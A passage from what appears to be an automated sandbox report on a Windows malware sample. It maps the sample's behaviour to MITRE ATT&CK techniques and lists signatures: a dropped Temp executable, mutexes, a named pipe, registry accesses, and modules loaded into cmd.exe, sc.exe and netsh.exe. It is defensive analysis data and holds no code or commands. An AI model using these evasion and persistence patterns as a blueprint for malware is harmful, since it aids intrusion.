"attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75550000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75110000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"GDI32.DLL\" at base 771f0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77d40000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"KERNEL32\" at base 77280000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c9c0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"KERNEL32.DLL\" at base 77280000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"WS2_32.DLL\" at base 77240000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"DBGHELP.DLL\" at base 6ddc0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"USER32.DLL\" at base 76070000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"ADVAPI32.DLL\" at base 75d70000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"SHELL32.DLL\" at base 76360000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"OLEAUT32.DLL\" at base 77360000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"MSVCR100.DLL\" at base 6a840000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"NTDLL.DLL\" at base 77b30000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"OLE32.DLL\" at base 75e20000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"CRYPTBASE.DLL\" at base 75930000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74640000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"PROPSYS.DLL\" at base 74760000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"COMCTL32.DLL\" at base 74930000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"APPHELP.DLL\" at base 758e0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"CLBCATQ.DLL\" at base 75fd0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6b110000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77280000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"SETUPAPI.DLL\" at base 76fb0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"RPCRT4.DLL\" at base 77460000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74760000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"NTMARTA.DLL\" at base 74ea0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77d60000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"PROFAPI.DLL\" at base 75a40000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75bc0000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76140000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"SECUR32.DLL\" at base 75760000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75c00000\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758e0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77280000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 771f0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77d40000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77280000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ctbzjelz.exe\" loaded module \"GDI32.DLL\" at base 771f0000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77d40000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ctbzjelz.exe\" loaded module \"KERNEL32\" at base 77280000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c9c0000\n \"ctbzjelz.exe\" loaded module \"KERNEL32.DLL\" at base 77280000\n \"ctbzjelz.exe\" loaded module \"WS2_32.DLL\" at base 77240000\n \"ctbzjelz.exe\" loaded module \"DBGHELP.DLL\" at base 6ddc0000\n \"ctbzjelz.exe\" loaded module \"USER32.DLL\" at base 76070000\n \"ctbzjelz.exe\" loaded module \"ADVAPI32.DLL\" at base 75d70000\n \"ctbzjelz.exe\" loaded module \"SHELL32.DLL\" at base 76360000\n \"ctbzjelz.exe\" loaded module \"OLEAUT32.DLL\" at base 77360000\n \"ctbzjelz.exe\" loaded module \"MSVCR100.DLL\" at base 6a840000\n \"ctbzjelz.exe\" loaded module \"SSPICLI.DLL\" at base 758c0000\n \"ctbzjelz.exe\" loaded module \"RPCRT4.DLL\" at base 77460000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77d60000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758e0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 77280000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c9c0000\n \"netsh.exe\" loaded module \"NSHWFP.DLL\" at base 692f0000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6f4e0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6e4c0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77280000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6d130000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6cf50000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6a960000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77280000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6d120000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69430000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6c4b0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6c0f0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a8f0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a8d0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 68f80000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68ec0000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 77460000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 68d60000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 69630000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 68c50000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 68b70000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 692e0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 68aa0000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75e20000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75930000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74640000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75440000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 76070000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75fd0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c410000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 75d70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77d60000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77d60000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77d60000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77d60000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 751d0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 759d0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 